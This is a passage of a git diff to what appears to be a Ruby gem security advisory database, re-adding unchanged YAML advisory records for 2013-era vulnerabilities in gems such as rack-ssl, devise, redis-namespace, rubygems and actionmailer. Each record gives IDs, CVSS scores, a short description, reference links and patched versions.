+  osvdb: 94679
+  url: https://security.snyk.io/vuln/SNYK-RUBY-ENUMCOLUMN3-20100
+  title: enum_column3 Gem for Ruby Symbol Creation Remote DoS
+  date: 2013-06-26
+  description: |
+    The enum_column3 Gem for Ruby contains a flaw that may allow a remote
+    denial of service. The issue is due to the program typecasting unexpected
+    strings to symbols. This may allow a remote attacker to crash the program.
+  related:
+    url:
+    - https://security.snyk.io/vuln/SNYK-RUBY-ENUMCOLUMN3-20100
+    - http://osvdb.org/show/osvdb/94679
+  notes: Never patched
+---
diff --git a/advisories/_posts/2013-07-09-CVE-2014-2538.md b/advisories/_posts/2013-07-09-CVE-2014-2538.md
index c382be2b..b4ffaef0 100644
--- a/advisories/_posts/2013-07-09-CVE-2014-2538.md
+++ b/advisories/_posts/2013-07-09-CVE-2014-2538.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2014-2538 (rack-ssl): CVE-2014-2538 rubygem rack-ssl: URL error display
-  XSS'
-comments: false
-categories:
-- rack-ssl
-advisory:
-  gem: rack-ssl
-  cve: 2014-2538
-  osvdb: 104734
-  ghsa: v3rr-cph9-2g2q
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-2538
-  title: 'CVE-2014-2538 rubygem rack-ssl: URL error display XSS'
-  date: 2013-07-09
-  description: |
-    Cross-site scripting (XSS) vulnerability in lib/rack/ssl.rb in the rack-ssl
-    gem before 1.4.0 for Ruby allows remote attackers to inject arbitrary web script
-    or HTML via a URI, which might not be properly handled by third-party adapters such
-    as JRuby-Rack.
-  cvss_v2: 4.3
-  patched_versions:
-  - ">= 1.3.4"
----
+---
+layout: advisory
+title: 'CVE-2014-2538 (rack-ssl): CVE-2014-2538 rubygem rack-ssl: URL error display
+  XSS'
+comments: false
+categories:
+- rack-ssl
+advisory:
+  gem: rack-ssl
+  cve: 2014-2538
+  osvdb: 104734
+  ghsa: v3rr-cph9-2g2q
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-2538
+  title: 'CVE-2014-2538 rubygem rack-ssl: URL error display XSS'
+  date: 2013-07-09
+  description: |
+    Cross-site scripting (XSS) vulnerability in lib/rack/ssl.rb in the rack-ssl
+    gem before 1.4.0 for Ruby allows remote attackers to inject arbitrary web script
+    or HTML via a URI, which might not be properly handled by third-party adapters such
+    as JRuby-Rack.
+  cvss_v2: 4.3
+  patched_versions:
+  - ">= 1.3.4"
+---
diff --git a/advisories/_posts/2013-07-25-CVE-2013-4170.md b/advisories/_posts/2013-07-25-CVE-2013-4170.md
index d8ee9c04..0bf72839 100644
--- a/advisories/_posts/2013-07-25-CVE-2013-4170.md
+++ b/advisories/_posts/2013-07-25-CVE-2013-4170.md
@@ -1,34 +1,34 @@
----
-layout: advisory
-title: 'CVE-2013-4170 (ember-source): Ember.js Potential XSS Exploit When Binding
-  `tagName` to User-Supplied Data'
-comments: false
-categories:
-- ember-source
-advisory:
-  gem: ember-source
-  cve: 2013-4170
-  ghsa: 5m48-c37x-f792
-  url: https://groups.google.com/forum/#!topic/ember-security/dokLVwwxAdM
-  title: Ember.js Potential XSS Exploit When Binding `tagName` to User-Supplied Data
-  date: 2013-07-25
-  description: |
-    In general, Ember.js escapes or strips any user-supplied content
-    before inserting it in strings that will be sent to innerHTML.
-    However, the `tagName` property of an `Ember.View` was inserted into
-    such a string without being sanitized. This means that if an
-    application assigns a view's `tagName` to user-supplied data, a
-    specially-crafted payload could execute arbitrary JavaScript in the
-    context of the current domain ("XSS").
-
-    This vulnerability only affects applications that assign or bind
-    user-provided content to `tagName`.
-  cvss_v3: 6.1
-  patched_versions:
-  - "~> 1.0.0.rc1.1"
-  - "~> 1.0.0.rc2.1"
-  - "~> 1.0.0.rc3.1"
-  - "~> 1.0.0.rc4.1"
-  - "~> 1.0.0.rc5.1"
-  - ">= 1.0.0.rc6.1"
----
+---
+layout: advisory
+title: 'CVE-2013-4170 (ember-source): Ember.js Potential XSS Exploit When Binding
+  `tagName` to User-Supplied Data'
+comments: false
+categories:
+- ember-source
+advisory:
+  gem: ember-source
+  cve: 2013-4170
+  ghsa: 5m48-c37x-f792
+  url: https://groups.google.com/forum/#!topic/ember-security/dokLVwwxAdM
+  title: Ember.js Potential XSS Exploit When Binding `tagName` to User-Supplied Data
+  date: 2013-07-25
+  description: |
+    In general, Ember.js escapes or strips any user-supplied content
+    before inserting it in strings that will be sent to innerHTML.
+    However, the `tagName` property of an `Ember.View` was inserted into
+    such a string without being sanitized. This means that if an
+    application assigns a view's `tagName` to user-supplied data, a
+    specially-crafted payload could execute arbitrary JavaScript in the
+    context of the current domain ("XSS").
+
+    This vulnerability only affects applications that assign or bind
+    user-provided content to `tagName`.
+  cvss_v3: 6.1
+  patched_versions:
+  - "~> 1.0.0.rc1.1"
+  - "~> 1.0.0.rc2.1"
+  - "~> 1.0.0.rc3.1"
+  - "~> 1.0.0.rc4.1"
+  - "~> 1.0.0.rc5.1"
+  - ">= 1.0.0.rc6.1"
+---
diff --git a/advisories/_posts/2013-08-02-CVE-2013-4203.md b/advisories/_posts/2013-08-02-CVE-2013-4203.md
index 11e25d4f..e2321c56 100644
--- a/advisories/_posts/2013-08-02-CVE-2013-4203.md
+++ b/advisories/_posts/2013-08-02-CVE-2013-4203.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2013-4203 (rgpg): rgpg Gem for Ruby lib/rgpg/gpg_helper.rb Remote Command
-  Execution'
-comments: false
-categories:
-- rgpg
-advisory:
-  gem: rgpg
-  cve: 2013-4203
-  osvdb: 95948
-  ghsa: jg4m-q6w8-vrjp
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-4203
-  title: rgpg Gem for Ruby lib/rgpg/gpg_helper.rb Remote Command Execution
-  date: 2013-08-02
-  description: |
-    rgpg Gem for Ruby contains a flaw in the GpgHelper module
-    (lib/rgpg/gpg_helper.rb). The issue is due to the program failing to properly
-    sanitize user-supplied input before being used in the system() function for
-    execution. This may allow a remote attacker to execute arbitrary commands.
-  cvss_v2: 7.5
-  patched_versions:
-  - ">= 0.2.3"
----
+---
+layout: advisory
+title: 'CVE-2013-4203 (rgpg): rgpg Gem for Ruby lib/rgpg/gpg_helper.rb Remote Command
+  Execution'
+comments: false
+categories:
+- rgpg
+advisory:
+  gem: rgpg
+  cve: 2013-4203
+  osvdb: 95948
+  ghsa: jg4m-q6w8-vrjp
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-4203
+  title: rgpg Gem for Ruby lib/rgpg/gpg_helper.rb Remote Command Execution
+  date: 2013-08-02
+  description: |
+    rgpg Gem for Ruby contains a flaw in the GpgHelper module
+    (lib/rgpg/gpg_helper.rb). The issue is due to the program failing to properly
+    sanitize user-supplied input before being used in the system() function for
+    execution. This may allow a remote attacker to execute arbitrary commands.
+  cvss_v2: 7.5
+  patched_versions:
+  - ">= 0.2.3"
+---
diff --git a/advisories/_posts/2013-08-02-OSVDB-114435.md b/advisories/_posts/2013-08-02-OSVDB-114435.md
index c7deec48..be1c2606 100644
--- a/advisories/_posts/2013-08-02-OSVDB-114435.md
+++ b/advisories/_posts/2013-08-02-OSVDB-114435.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'OSVDB-114435 (devise): CSRF token fixation attacks in Devise'
-comments: false
-categories:
-- devise
-advisory:
-  gem: devise
-  osvdb: 114435
-  url: http://blog.plataformatec.com.br/2013/08/csrf-token-fixation-attacks-in-devise/
-  title: CSRF token fixation attacks in Devise
-  date: 2013-08-02
-  description: |
-    Devise contains a flaw that allows a remote, user-assisted attacker to
-    conduct a CSRF token fixation attack. This issue is triggered as previous
-    CSRF tokens are not properly invalidated when a new token is created.
-    If an attacker has knowledge of said token, a specially crafted request can
-    be made to it, allowing the attacker to conduct CSRF attacks.
-  patched_versions:
-  - "~> 2.2.5"
-  - ">= 3.0.1"
-  related:
-    url:
-    - http://blog.plataformatec.com.br/2013/08/csrf-token-fixation-attacks-in-devise
-    - https://github.com/heartcombo/devise/commit/747751a20f50aa8814dcd3eb9a3648f00ab6a707
-    - https://github.com/heartcombo/devise/compare/v3.0.0...v3.0.1
-    - https://my.diffend.io/gems/devise/3.0.0/3.0.1
-    - https://security.snyk.io/vuln/SNYK-RUBY-DEVISE-20103
----
+---
+layout: advisory
+title: 'OSVDB-114435 (devise): CSRF token fixation attacks in Devise'
+comments: false
+categories:
+- devise
+advisory:
+  gem: devise
+  osvdb: 114435
+  url: http://blog.plataformatec.com.br/2013/08/csrf-token-fixation-attacks-in-devise/
+  title: CSRF token fixation attacks in Devise
+  date: 2013-08-02
+  description: |
+    Devise contains a flaw that allows a remote, user-assisted attacker to
+    conduct a CSRF token fixation attack. This issue is triggered as previous
+    CSRF tokens are not properly invalidated when a new token is created.
+    If an attacker has knowledge of said token, a specially crafted request can
+    be made to it, allowing the attacker to conduct CSRF attacks.
+  patched_versions:
+  - "~> 2.2.5"
+  - ">= 3.0.1"
+  related:
+    url:
+    - http://blog.plataformatec.com.br/2013/08/csrf-token-fixation-attacks-in-devise
+    - https://github.com/heartcombo/devise/commit/747751a20f50aa8814dcd3eb9a3648f00ab6a707
+    - https://github.com/heartcombo/devise/compare/v3.0.0...v3.0.1
+    - https://my.diffend.io/gems/devise/3.0.0/3.0.1
+    - https://security.snyk.io/vuln/SNYK-RUBY-DEVISE-20103
+---
diff --git a/advisories/_posts/2013-08-03-OSVDB-96425.md b/advisories/_posts/2013-08-03-OSVDB-96425.md
index 4632e2c7..cca910c8 100644
--- a/advisories/_posts/2013-08-03-OSVDB-96425.md
+++ b/advisories/_posts/2013-08-03-OSVDB-96425.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'OSVDB-96425 (redis-namespace): redis-namespace Gem for Ruby contains a flaw
-  in the method_missing implementation'
-comments: false
-categories:
-- redis-namespace
-advisory:
-  gem: redis-namespace
-  osvdb: 96425
-  url: http://blog.steveklabnik.com/posts/2013-08-03-redis-namespace-1-3-1--security-release
-  title: redis-namespace Gem for Ruby contains a flaw in the method_missing implementation
-  date: 2013-08-03
-  description: |
-    redis-namespace Gem for Ruby contains a flaw in the method_missing implementation.
-    The issue is triggered when handling exec commands called via send(). This may allow a
-    remote attacker to execute arbitrary commands.
-  patched_versions:
-  - "~> 1.0.4"
-  - "~> 1.1.1"
-  - "~> 1.2.2"
-  - ">= 1.3.1"
-  related:
-    url:
-    - http://blog.steveklabnik.com/posts/2013-08-03-redis-namespace-1-3-1--security-release
-    - https://github.com/resque/redis-namespace/issues/65
-    - https://github.com/resque/redis-namespace/commit/6d839515e8a3fdc17b5fb391500fda3f919689d6
-    - https://security.snyk.io/vuln/SNYK-RUBY-REDISNAMESPACE-20105
----
+---
+layout: advisory
+title: 'OSVDB-96425 (redis-namespace): redis-namespace Gem for Ruby contains a flaw
+  in the method_missing implementation'
+comments: false
+categories:
+- redis-namespace
+advisory:
+  gem: redis-namespace
+  osvdb: 96425
+  url: http://blog.steveklabnik.com/posts/2013-08-03-redis-namespace-1-3-1--security-release
+  title: redis-namespace Gem for Ruby contains a flaw in the method_missing implementation
+  date: 2013-08-03
+  description: |
+    redis-namespace Gem for Ruby contains a flaw in the method_missing implementation.
+    The issue is triggered when handling exec commands called via send(). This may allow a
+    remote attacker to execute arbitrary commands.
+  patched_versions:
+  - "~> 1.0.4"
+  - "~> 1.1.1"
+  - "~> 1.2.2"
+  - ">= 1.3.1"
+  related:
+    url:
+    - http://blog.steveklabnik.com/posts/2013-08-03-redis-namespace-1-3-1--security-release
+    - https://github.com/resque/redis-namespace/issues/65
+    - https://github.com/resque/redis-namespace/commit/6d839515e8a3fdc17b5fb391500fda3f919689d6
+    - https://security.snyk.io/vuln/SNYK-RUBY-REDISNAMESPACE-20105
+---
diff --git a/advisories/_posts/2013-08-14-CVE-2013-5647.md b/advisories/_posts/2013-08-14-CVE-2013-5647.md
index 5295bfc6..de3a2ac0 100644
--- a/advisories/_posts/2013-08-14-CVE-2013-5647.md
+++ b/advisories/_posts/2013-08-14-CVE-2013-5647.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2013-5647 (sounder): Sounder Gem for Ruby File Name Handling Arbitrary
-  Command Execution'
-comments: false
-categories:
-- sounder
-advisory:
-  gem: sounder
-  cve: 2013-5647
-  osvdb: 96278
-  ghsa: rfmf-rx8w-935w
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-5647
-  title: Sounder Gem for Ruby File Name Handling Arbitrary Command Execution
-  date: 2013-08-14
-  description: |
-    Sounder Gem for Ruby contains a flaw that is triggered during the handling
-    of file names. This may allow a context-dependent attacker to execute
-    arbitrary commands.
-  cvss_v2: 7.5
-  patched_versions:
-  - ">= 1.0.2"
----
+---
+layout: advisory
+title: 'CVE-2013-5647 (sounder): Sounder Gem for Ruby File Name Handling Arbitrary
+  Command Execution'
+comments: false
+categories:
+- sounder
+advisory:
+  gem: sounder
+  cve: 2013-5647
+  osvdb: 96278
+  ghsa: rfmf-rx8w-935w
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-5647
+  title: Sounder Gem for Ruby File Name Handling Arbitrary Command Execution
+  date: 2013-08-14
+  description: |
+    Sounder Gem for Ruby contains a flaw that is triggered during the handling
+    of file names. This may allow a context-dependent attacker to execute
+    arbitrary commands.
+  cvss_v2: 7.5
+  patched_versions:
+  - ">= 1.0.2"
+---
diff --git a/advisories/_posts/2013-09-01-CVE-2013-4318.md b/advisories/_posts/2013-09-01-CVE-2013-4318.md
index 665a268e..a58a4913 100644
--- a/advisories/_posts/2013-09-01-CVE-2013-4318.md
+++ b/advisories/_posts/2013-09-01-CVE-2013-4318.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2013-4318 (features): Features Gem for Ruby /tmp/out.html Local XSS'
-comments: false
-categories:
-- features
-advisory:
-  gem: features
-  cve: 2013-4318
-  osvdb: 96975
-  ghsa: 42gq-h7xj-33r4
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-4318
-  title: Features Gem for Ruby /tmp/out.html Local XSS
-  date: 2013-09-01
-  description: |
-    Features Gem for Ruby contains a flaw that allows a local cross-site
-    scripting (XSS) attack. This flaw exists because the application does not validate
-    certain input upon submission to /tmp/out.html. This may allow an attacker to create
-    a specially crafted request that would execute arbitrary script code in a user's
-    browser within the trust relationship between their browser and the server.
-  cvss_v3: 5.4
----
+---
+layout: advisory
+title: 'CVE-2013-4318 (features): Features Gem for Ruby /tmp/out.html Local XSS'
+comments: false
+categories:
+- features
+advisory:
+  gem: features
+  cve: 2013-4318
+  osvdb: 96975
+  ghsa: 42gq-h7xj-33r4
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-4318
+  title: Features Gem for Ruby /tmp/out.html Local XSS
+  date: 2013-09-01
+  description: |
+    Features Gem for Ruby contains a flaw that allows a local cross-site
+    scripting (XSS) attack. This flaw exists because the application does not validate
+    certain input upon submission to /tmp/out.html. This may allow an attacker to create
+    a specially crafted request that would execute arbitrary script code in a user's
+    browser within the trust relationship between their browser and the server.
+  cvss_v3: 5.4
+---
diff --git a/advisories/_posts/2013-09-03-CVE-2013-5671.md b/advisories/_posts/2013-09-03-CVE-2013-5671.md
index d5badd47..3ac879bc 100644
--- a/advisories/_posts/2013-09-03-CVE-2013-5671.md
+++ b/advisories/_posts/2013-09-03-CVE-2013-5671.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2013-5671 (fog-dragonfly): fog-dragonfly Gem for Ruby imagemagickutils.rb
-  Remote Command Execution'
-comments: false
-categories:
-- fog-dragonfly
-advisory:
-  gem: fog-dragonfly
-  cve: 2013-5671
-  osvdb: 96798
-  ghsa: qrgf-jqqm-x7xv
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-5671
-  title: fog-dragonfly Gem for Ruby imagemagickutils.rb Remote Command Execution
-  date: 2013-09-03
-  description: |
-    fog-dragonfly Gem for Ruby contains a flaw that is due to the program
-    failing to properly sanitize input passed via the imagemagickutils.rb script.
-    This may allow a remote attacker to execute arbitrary commands.
-
-    This gem has been renamed. Please use "dragonfly" from now on.
-  cvss_v2: 7.5
-  patched_versions:
-  - ">= 0.8.4"
----
+---
+layout: advisory
+title: 'CVE-2013-5671 (fog-dragonfly): fog-dragonfly Gem for Ruby imagemagickutils.rb
+  Remote Command Execution'
+comments: false
+categories:
+- fog-dragonfly
+advisory:
+  gem: fog-dragonfly
+  cve: 2013-5671
+  osvdb: 96798
+  ghsa: qrgf-jqqm-x7xv
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-5671
+  title: fog-dragonfly Gem for Ruby imagemagickutils.rb Remote Command Execution
+  date: 2013-09-03
+  description: |
+    fog-dragonfly Gem for Ruby contains a flaw that is due to the program
+    failing to properly sanitize input passed via the imagemagickutils.rb script.
+    This may allow a remote attacker to execute arbitrary commands.
+
+    This gem has been renamed. Please use "dragonfly" from now on.
+  cvss_v2: 7.5
+  patched_versions:
+  - ">= 0.8.4"
+---
diff --git a/advisories/_posts/2013-09-09-CVE-2013-4287.md b/advisories/_posts/2013-09-09-CVE-2013-4287.md
index 06ac347d..1dca78c8 100644
--- a/advisories/_posts/2013-09-09-CVE-2013-4287.md
+++ b/advisories/_posts/2013-09-09-CVE-2013-4287.md
@@ -1,30 +1,30 @@
----
-layout: advisory
-title: 'CVE-2013-4287 (rubygems-update): CVE-2013-4287 rubygems: version regex algorithmic
-  complexity vulnerability'
-comments: false
-categories:
-- rubygems-update
-- rubygems
-advisory:
-  gem: rubygems-update
-  library: rubygems
-  cve: 2013-4287
-  osvdb: 97163
-  ghsa: 9j7m-rjqx-48vh
-  url: http://blog.rubygems.org/2013/09/09/CVE-2013-4287.html
-  title: 'CVE-2013-4287 rubygems: version regex algorithmic complexity vulnerability'
-  date: 2013-09-09
-  description: |
-    Algorithmic complexity vulnerability in Gem::Version::VERSION_PATTERN
-    in lib/rubygems/version.rb in RubyGems before 1.8.23.1, 1.8.24 through 1.8.25, 2.0.x
-    before 2.0.8, and 2.1.x before 2.1.0, as used in Ruby 1.9.0 through 2.0.0p247, allows
-    remote attackers to cause a denial of service (CPU consumption) via a crafted gem
-    version that triggers a large amount of backtracking in a regular expression.
-  cvss_v2: 4.3
-  patched_versions:
-  - "~> 1.8.23.1"
-  - "~> 1.8.26"
-  - "~> 2.0.8"
-  - ">= 2.1.0"
----
+---
+layout: advisory
+title: 'CVE-2013-4287 (rubygems-update): CVE-2013-4287 rubygems: version regex algorithmic
+  complexity vulnerability'
+comments: false
+categories:
+- rubygems-update
+- rubygems
+advisory:
+  gem: rubygems-update
+  library: rubygems
+  cve: 2013-4287
+  osvdb: 97163
+  ghsa: 9j7m-rjqx-48vh
+  url: http://blog.rubygems.org/2013/09/09/CVE-2013-4287.html
+  title: 'CVE-2013-4287 rubygems: version regex algorithmic complexity vulnerability'
+  date: 2013-09-09
+  description: |
+    Algorithmic complexity vulnerability in Gem::Version::VERSION_PATTERN
+    in lib/rubygems/version.rb in RubyGems before 1.8.23.1, 1.8.24 through 1.8.25, 2.0.x
+    before 2.0.8, and 2.1.x before 2.1.0, as used in Ruby 1.9.0 through 2.0.0p247, allows
+    remote attackers to cause a denial of service (CPU consumption) via a crafted gem
+    version that triggers a large amount of backtracking in a regular expression.
+  cvss_v2: 4.3
+  patched_versions:
+  - "~> 1.8.23.1"
+  - "~> 1.8.26"
+  - "~> 2.0.8"
+  - ">= 2.1.0"
+---
diff --git a/advisories/_posts/2013-09-19-CVE-2013-6459.md b/advisories/_posts/2013-09-19-CVE-2013-6459.md
index 9aba717e..2873042b 100644
--- a/advisories/_posts/2013-09-19-CVE-2013-6459.md
+++ b/advisories/_posts/2013-09-19-CVE-2013-6459.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2013-6459 (will_paginate): CVE-2013-6459 rubygem-will_paginate: XSS vulnerabilities'
-comments: false
-categories:
-- will_paginate
-advisory:
-  gem: will_paginate
-  cve: 2013-6459
-  osvdb: 101138
-  ghsa: 8r6h-7x9g-xmw9
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-6459
-  title: 'CVE-2013-6459 rubygem-will_paginate: XSS vulnerabilities'
-  date: 2013-09-19
-  description: |
-    Cross-site scripting (XSS) vulnerability in the will_paginate gem before
-    3.0.5 for Ruby allows remote attackers to inject arbitrary web script or HTML via
-    vectors involving generated pagination links. It was found that ruby will_paginate
-    is vulnerable to a XSS via malformed input that cause pagination to occur on an
-    improper boundary. This could allow an attacker with the ability to pass data to
-    the will_paginate gem to display arbitrary HTML including scripting code within
-    the web interface.
-  cvss_v2: 4.3
-  patched_versions:
-  - ">= 3.0.5"
----
+---
+layout: advisory
+title: 'CVE-2013-6459 (will_paginate): CVE-2013-6459 rubygem-will_paginate: XSS vulnerabilities'
+comments: false
+categories:
+- will_paginate
+advisory:
+  gem: will_paginate
+  cve: 2013-6459
+  osvdb: 101138
+  ghsa: 8r6h-7x9g-xmw9
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-6459
+  title: 'CVE-2013-6459 rubygem-will_paginate: XSS vulnerabilities'
+  date: 2013-09-19
+  description: |
+    Cross-site scripting (XSS) vulnerability in the will_paginate gem before
+    3.0.5 for Ruby allows remote attackers to inject arbitrary web script or HTML via
+    vectors involving generated pagination links. It was found that ruby will_paginate
+    is vulnerable to a XSS via malformed input that cause pagination to occur on an
+    improper boundary. This could allow an attacker with the ability to pass data to
+    the will_paginate gem to display arbitrary HTML including scripting code within
+    the web interface.
+  cvss_v2: 4.3
+  patched_versions:
+  - ">= 3.0.5"
+---
diff --git a/advisories/_posts/2013-09-24-CVE-2013-4363.md b/advisories/_posts/2013-09-24-CVE-2013-4363.md
index ca1b57cb..c2a988b8 100644
--- a/advisories/_posts/2013-09-24-CVE-2013-4363.md
+++ b/advisories/_posts/2013-09-24-CVE-2013-4363.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2013-4363 (rubygems-update): CVE-2013-4363 rubygems: version regex algorithmic
-  complexity vulnerability, incomplete CVE-2013-4287 fix'
-comments: false
-categories:
-- rubygems-update
-- rubygems
-advisory:
-  gem: rubygems-update
-  library: rubygems
-  cve: 2013-4363
-  osvdb: 97163
-  ghsa: 9qvm-2vhf-q649
-  url: http://blog.rubygems.org/2013/09/24/CVE-2013-4363.html
-  title: 'CVE-2013-4363 rubygems: version regex algorithmic complexity vulnerability,
-    incomplete CVE-2013-4287 fix'
-  date: 2013-09-24
-  description: |
-    'Algorithmic complexity vulnerability in Gem::Version::ANCHORED_VERSION_PATTERN
-    in lib/rubygems/version.rb in RubyGems before 1.8.23.2, 1.8.24 through 1.8.26, 2.0.x
-    before 2.0.10, and 2.1.x before 2.1.5, as used in Ruby 1.9.0 through 2.0.0p247,
-    allows remote attackers to cause a denial of service (CPU consumption) via a crafted
-    gem version that triggers a large amount of backtracking in a regular expression.  NOTE:
-    this issue is due to an incomplete fix for CVE-2013-4287.'
-  cvss_v2: 4.3
-  patched_versions:
-  - "~> 1.8.23.2"
-  - "~> 1.8.27"
-  - "~> 2.0.10"
-  - ">= 2.1.5"
----
+---
+layout: advisory
+title: 'CVE-2013-4363 (rubygems-update): CVE-2013-4363 rubygems: version regex algorithmic
+  complexity vulnerability, incomplete CVE-2013-4287 fix'
+comments: false
+categories:
+- rubygems-update
+- rubygems
+advisory:
+  gem: rubygems-update
+  library: rubygems
+  cve: 2013-4363
+  osvdb: 97163
+  ghsa: 9qvm-2vhf-q649
+  url: http://blog.rubygems.org/2013/09/24/CVE-2013-4363.html
+  title: 'CVE-2013-4363 rubygems: version regex algorithmic complexity vulnerability,
+    incomplete CVE-2013-4287 fix'
+  date: 2013-09-24
+  description: |
+    'Algorithmic complexity vulnerability in Gem::Version::ANCHORED_VERSION_PATTERN
+    in lib/rubygems/version.rb in RubyGems before 1.8.23.2, 1.8.24 through 1.8.26, 2.0.x
+    before 2.0.10, and 2.1.x before 2.1.5, as used in Ruby 1.9.0 through 2.0.0p247,
+    allows remote attackers to cause a denial of service (CPU consumption) via a crafted
+    gem version that triggers a large amount of backtracking in a regular expression.  NOTE:
+    this issue is due to an incomplete fix for CVE-2013-4287.'
+  cvss_v2: 4.3
+  patched_versions:
+  - "~> 1.8.23.2"
+  - "~> 1.8.27"
+  - "~> 2.0.10"
+  - ">= 2.1.5"
+---
diff --git a/advisories/_posts/2013-10-01-CVE-2013-7463.md b/advisories/_posts/2013-10-01-CVE-2013-7463.md
index 099c1ec0..340a7fea 100644
--- a/advisories/_posts/2013-10-01-CVE-2013-7463.md
+++ b/advisories/_posts/2013-10-01-CVE-2013-7463.md
@@ -1,19 +1,19 @@
----
-layout: advisory
-title: 'CVE-2013-7463 (aescrypt): Vulnerability in aescrypt because IV is not randomized'
-comments: false
-categories:
-- aescrypt
-advisory:
-  gem: aescrypt
-  cve: 2013-7463
-  ghsa: 4c4w-3q45-hp9j
-  url: https://github.com/Gurpartap/aescrypt/issues/4
-  title: Vulnerability in aescrypt because IV is not randomized
-  date: 2013-10-01
-  description: |
-    The aescrypt gem 1.0.0 for Ruby does not randomize the CBC IV for use with the
-    AESCrypt.encrypt and AESCrypt.decrypt functions, which allows attackers to
-    defeat cryptographic protection mechanisms via a chosen plaintext attack.
-  cvss_v3: 7.5
----
+---
+layout: advisory
+title: 'CVE-2013-7463 (aescrypt): Vulnerability in aescrypt because IV is not randomized'
+comments: false
+categories:
+- aescrypt
+advisory:
+  gem: aescrypt
+  cve: 2013-7463
+  ghsa: 4c4w-3q45-hp9j
+  url: https://github.com/Gurpartap/aescrypt/issues/4
+  title: Vulnerability in aescrypt because IV is not randomized
+  date: 2013-10-01
+  description: |
+    The aescrypt gem 1.0.0 for Ruby does not randomize the CBC IV for use with the
+    AESCrypt.encrypt and AESCrypt.decrypt functions, which allows attackers to
+    defeat cryptographic protection mechanisms via a chosen plaintext attack.
+  cvss_v3: 7.5
+---
diff --git a/advisories/_posts/2013-10-08-CVE-2013-4413.md b/advisories/_posts/2013-10-08-CVE-2013-4413.md
index 34e204fa..58875ae3 100644
--- a/advisories/_posts/2013-10-08-CVE-2013-4413.md
+++ b/advisories/_posts/2013-10-08-CVE-2013-4413.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2013-4413 (wicked): Wicked Gem for Ruby contains a flaw'
-comments: false
-categories:
-- wicked
-advisory:
-  gem: wicked
-  cve: 2013-4413
-  osvdb: 98270
-  ghsa: rprj-g6xc-p5gq
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-4413
-  title: Wicked Gem for Ruby contains a flaw
-  date: 2013-10-08
-  description: |
-    Wicked Gem for Ruby contains a flaw that is due to the program failing
-    to properly sanitize input passed via the 'the_step' parameter upon submission to
-    the render_redirect.rb script. This may allow a remote attacker to gain access to
-    arbitrary files.
-  cvss_v2: 5.0
-  patched_versions:
-  - ">= 1.0.1"
----
+---
+layout: advisory
+title: 'CVE-2013-4413 (wicked): Wicked Gem for Ruby contains a flaw'
+comments: false
+categories:
+- wicked
+advisory:
+  gem: wicked
+  cve: 2013-4413
+  osvdb: 98270
+  ghsa: rprj-g6xc-p5gq
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-4413
+  title: Wicked Gem for Ruby contains a flaw
+  date: 2013-10-08
+  description: |
+    Wicked Gem for Ruby contains a flaw that is due to the program failing
+    to properly sanitize input passed via the 'the_step' parameter upon submission to
+    the render_redirect.rb script. This may allow a remote attacker to gain access to
+    arbitrary files.
+  cvss_v2: 5.0
+  patched_versions:
+  - ">= 1.0.1"
+---
diff --git a/advisories/_posts/2013-10-16-CVE-2013-4389.md b/advisories/_posts/2013-10-16-CVE-2013-4389.md
index 5f30e922..faf9241f 100644
--- a/advisories/_posts/2013-10-16-CVE-2013-4389.md
+++ b/advisories/_posts/2013-10-16-CVE-2013-4389.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2013-4389 (actionmailer): CVE-2013-4389 rubygem-actionmailer: email address
-  processing DoS'
-comments: false
-categories:
-- actionmailer
-- rails
-advisory:
-  gem: actionmailer
-  framework: rails
-  cve: 2013-4389
-  osvdb: 98629
-  ghsa: rg5m-3fqp-6px8
-  url: https://nvd.nist.gov/vuln/detail/CVE-2013-4389
-  title: 'CVE-2013-4389 rubygem-actionmailer: email address processing DoS'
-  date: 2013-10-16
-  description: |
-    Multiple format string vulnerabilities in log_subscriber.rb files in
-    the log subscriber component in Action Mailer in Ruby on Rails 3.x before 3.2.15
-    allow remote attackers to cause a denial of service via a crafted e-mail address
-    that is improperly handled during construction of a log message.
-  cvss_v2: 4.3
-  unaffected_versions:
-  - "~> 2.3.2"
-  patched_versions:
-  - ">= 3.2.15"
----
+---
+layout: advisory
+title: 'CVE-2013-4389 (actionmailer): CVE-2013-4389 rubygem-actionmailer: email address
+  processing DoS'
+comments: false
+categories:
+- actionmailer
+- rails
+advisory:
+  gem: actionmailer
+  framework: rails
+  cve: 2013-4389
+  osvdb: 98629
+  ghsa: rg5m-3fqp-6px8
+  url: https://nvd.nist.gov/vuln/detail/CVE-2013-4389
+  title: 'CVE-2013-4389 rubygem-actionmailer: email address processing DoS'
+  date: 2013-10-16
+  description: |
+    Multiple format string vulnerabilities in log_subscriber.rb files in
+    the log subscriber component in Action Mailer in Ruby on Rails 3.x before 3.2.15
+    allow remote attackers to cause a denial of service via a crafted e-mail address
+    that is improperly handled during construction of a log message.
+  cvss_v2: 4.3
+  unaffected_versions:
+  - "~> 2.3.2"
+  patched_versions:
+  - ">= 3.2.15"
+---
diff --git a/advisories/_posts/2013-10-22-CVE-2013-4457.md b/advisories/_posts/2013-10-22-CVE-2013-4457.md
index 54929fc4..f30ac9ba 100644
--- a/advisories/_posts/2013-10-22-CVE-2013-4457.md
